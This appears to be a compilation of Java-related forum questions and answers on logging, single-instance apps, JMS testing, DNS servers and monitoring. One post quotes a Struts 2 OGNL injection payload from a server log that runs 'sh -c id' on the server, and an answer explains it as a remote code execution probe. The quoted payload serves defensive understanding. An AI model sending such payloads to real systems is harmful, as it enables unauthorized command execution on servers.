We have some service running on 'n' number of hosts behind a VIP. When there is some fault that occurs with specific request call, we might be interested to know the reason by looking at the logs on the respected host where the fault occurred. since the request could go to any host, when it comes to tracking logs, we need to know from which host the fault originated.
One solution is to store the host name in the database of our service along with other information.
The alternative is, pushing the logs onto a common store and tracing it there.
I personally feel that if we go with the first approach, we might end up in adding many such debugging related attributes in the application database thereby polluting it. However the second option is also not that easy to implement and incurs some overhead. Moreover on which host the fault occurred does not help much except in case the fault occurred due to some hardware specific issue.
What do you guys suggest?
Without knowing more about your infrastructure, it's hard to be precise, but here are some general points of view.
I don't like using databases for storing application logs - if the database falls over, you wouldn't be able to log it! It's also not really relational data, and you can't get the monitoring tools that are available for other solutions.
My recommendation is to use your operating system's built in event logging solution; most logging frameworks support this out of the box. On Windows, that's the event log; on *nix there's the syslog system. Logging should be quick, cheap, and bullet proof - that's what you get from the OS tools.
The second question is then how you use those logs for trouble shooting and monitoring. There are lots of tools for doing this, though mostly aimed at system administrators rather than developers. Microsoft have MoM, there's Tivoli and Big Brother - as well as a whole bunch of open source tools. I'd use those, rather than build your own solution.
The key point is - logging should be fast, cheap and robust; the analysis and monitoring stuff should be entirel separate from your application logic, so you can reuse the tools and processes acros multiple projects.
storing the hostname should be quite cheap I guess. I understand you are appending logs to a db?
you could also store the pid for each process, that can help you in case you have multiple processes running on same hostname. The combination hostname/pid/timestamp will ensure you identify uniquely a process.
Related
I'm developing an application (Java & JavaFX) that writes/reads data (a file). The problem is I don't want to restrict user to run only one instance (of my app) at a time, as I really can't think of reliable way of doing that so it works on both Windows and Linuxes (e.g. server), heard of sockets and files - both are defective IMO. As user is able to run multiple instances, writing/reading data (from a file) seems really messy, because there's no guarantee that file locking will work reliably on Windows and Linuxes (FileLock documentation - click here).
To sum up: I can't restrict multiple instances of my app, but that leads to problem with writing/reading data (from a file).
Is there anything I missed? Maybe there's some other way to solve my problem I can't think of? How do the "big" popular programs handle that?
Suggested: Use a socket solution
You could follow the techniques outlined in an answer to:
JavaFX Single Instance Application
FAQ
Addressing some additional questions:
heard of sockets and files - both are defective IMO.
You state your opinion that using sockets to set up a single instance application won’t work well enough for you. You are in the best position to decide that.
For some apps which want to achieve a single instance, the socket-based or file-based solution outlined in the answer to the linked question or other comments will work well enough.
"What happens if more than one user try to run the application? Won't they conflict on opening the socket?"
Prevent launching multiple instances of a java application
And:
Also, I can't be sure if chosen port (fixed, since all instances should check for one port) is being used by some other applications/processes
You may be able to address some of these concerns by enhancing the socket-based solutions outlined in the linked questions.
Enhanced Socket Solution Outline
If you want, you can write an enhanced algorithm to deal with some of these issues.
When another app instance startup occurs, you try to connect to a current instance on a well-known socket.
Check the response to the connection.
If it doesn’t respond with the correct protocol response (e.g. matching user and app name) then increment the port by 2 and retry.
Test the response again until either:
You get a match for the app/user combo, then send a signal to that app to display itself.
OR
If you get no match, then create a new instance on the tested open port.
I'm not suggesting you do that, just explaining that it is possible.
Alternative: OS native service
There are also other OS-specific mechanisms for handling this such as Windows or Linux services which you can investigate if you want, those approaches are involved and vary by OS, so I won’t discuss them in detail here.
For the OS-specific solutions, you usually would:
Create a native package for your app (e.g. using jpackage)
Install it.
Have the installer config the app as a service
e.g. on linux, create an init.d script with a pid file configured via chkconfig.
The service launches on boot and stops on shutdown.
The app is then accessed via a tray icon or something similar
The means of interaction is often OS version specific.
Alternative: Allow multiple app instances but use a single database instance
You may also consider using a database rather than files for data storage, as a database system can help solve many of the concurrent access issues which can arise with file based solutions. Multiple clients can connect to the database, and the database and your app code can handle locks and collisions on the data access to ensure data integrity is contained. Using such a solution, there is no need to enforce that a single application instance is running for a user (at least from a data integrity perspective).
In my server log of my web server, I've noticed a hacker trying this:
https://[domain name]/index.action?action:${%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]{'sh','-c','id'})).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27),%23matt.getwriter().println(%23e),%23matt.getwriter().flush(),%23matt.getwriter().close()}
Which URL decodes to this:
https://[domain name]/index.action?action:${#a=(new java.lang.processbuilder(new java.lang.string[]{'sh','-c','id'})).start(),#b=#a.getinputstream(),#c=new java.io.inputstreamreader(#b),#d=new java.io.bufferedreader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),#matt.getwriter().println(#e),#matt.getwriter().flush(),#matt.getwriter().close()}
My server doesn't use Java but I'm trying to understand what this hacker is trying to do here and why this could be a vulnerability. After all, I'm not just a developer but also need to know about how to protect a server, including servers not set up by me.
Code seems to start a new process and then tries to read data from the input stream. I'm assuming this is the input stream of the current web session.
As this attack is also tried over /login.action and various other URL's and different Java code, I am considering it to be potential dangerous. But I can't explain why this is dangerous.
The specific domain is under attack right now as the hacker tries to see if it's running WordPress or Magenta or other known systems and also tries several different attacks.
But what matters is this: the domain is currently under development and the owner still has to decide which development tools will be used. The choices are between Java and ASP-NET so is this attack dangerous if he chooses to pick Java?
It's trying to exploit a RCE vulnerability in Struts 2, I think this one. A bad one, Freemarker would execute any code inside ${} tags.
The Freemarker code starts a process to execute id to see if the server is running as root, giving full access to the box. Even a vulnerable Struts version might not be too bad here, since the attacker might not be interested unless you were root.
The attacker's program has a lot of these old vulnerabilities that would work on very unsafe servers, but even simple admin protocol will protect against these amateur attacks. You would only be vulnerable when running as root, using an old version of a software, opening up your db server to the internet with a weak or default password, etc.
Regardless of the technology you choose, there will be security issues and you need to follow the CVEs. For example a modern Java framework like Spring has a few, but remote code execution is quite rare, and that's what those attack programs look for.
I'm looking for some simple methods to add some hooks into my Java backend code, like some counters or any other kind of value. These values should be easily accessible via an URL or API for monitoring or health-check. Also some tools to trigger an alert based on an unwanted condition that has arised in the server?
(Based on my and Gilbert's comments.)
First of all, there is no magic bullet solution. The actual work of gathering statistics, status values and the detection of "unwanted conditions" (or anomalous events) is down to the application code.
However, there some standard approaches to getting hold of this kind of information from a running application.
Instead of exposing the stats and status info via HTTP(s), you could use JMX to expose is, and use off-the-shelf JMX console softeare to access it.
The "unwanted conditions" / anomalous events requirement could be handled by using an off-the-shelf logging library. You then use an off-the-shelf external monitoring tool / system to scan for events and generate notifications.
Is it worth the effort? Depends on the nature of the server. (And on how much effort you can avoid by using monitoring infrastructure paid for or run by someone else.)
In production we have multiple containers deployed and any one can be a consumer of one JMS queue. In our development environment, we have multiple developers each with a container that will potentially consume messages. When a developer wants to test something related to JMS by putting something on the queue, though, the message is often consumed by someone else which can be be a time sink.
We use the same build files for every environment. We do not want to accidentally deploy something to an upper environment that is meant strictly for the development environment.
What is a best practice in handling something like this that will not involve build tokens, etc or building differently for different environments?
We currently have the developer ask the other developers to comment out the consuming code, but this is a risk as the commented out code could accidentally get checked in.
One potential way would be to store a property in the database that would change from environment to environment.
How have you handled this?
The way I've seen this done is for each developer to have their own topic, which is specific to their local dev environment. This depends on the developer having some control over the producer, obviously, not sure if this is viable for you.
You don't need build tokens to do this, but tokens do make things a lot nicer for local setup/configuration. I am quite surprised that you are able to use the same build files with no tokenization across every environment, I don't think I've ever worked on such a system.
Is there an already written Java DNS Server that only implements authoritative responses. I would like to take the source code and move it into a DNS server we will be developing that will use custom rule sets to decide what TTL to use and what IP address to publish.
The server will not be a caching server. It will only return authoritative results and only be published on the WHOIS record for the domains. It will never be called directly.
The server will have to publish MX records, A records and SPF/TXT records. The plan is to use DNS to assist in load balancing among gateway-servers on multiple locations (we are aware that DNS has a short reach in this area). Also it will cease to publish IP addesses of gateway-servers when they go down (on purpose or on accident) (granted, DNS will only be able to help during extended outages).
We will write the logic for all this ourselves.. but I would very much like to start with a DNS server that has been through a little testing instead of starting from scratch.
However, that is only feasible if what we copy from is simple enough. Otherwise,, it could turn out to be a waste of time
George,
I guess what you need is a java library which implements DNS protocol.
Take a look at dnsjava
This is very good in terms of complete spec coverage of all types of records and class.
But the issue which you might face with a java based library is performance.
DNS servers would be expected to have a high throughput. But yes, you can solve that by throwing more hardware.
If performance is a concern for you , I would suggest to look into unbound
http://www.xbill.org/dnsjava/
Unfortunately, the documentation states "jnamed should not be used for production, and should probably not be used for testing. If the above documentation is not enough,
please do not ask for more, because it really should not be used."
I'm not aware of any better alternatives, however.
You could take a look at Eagle DNS:
http://www.unlogic.se/projects/eagledns
It's been around for a few years and it's quite well tested by now.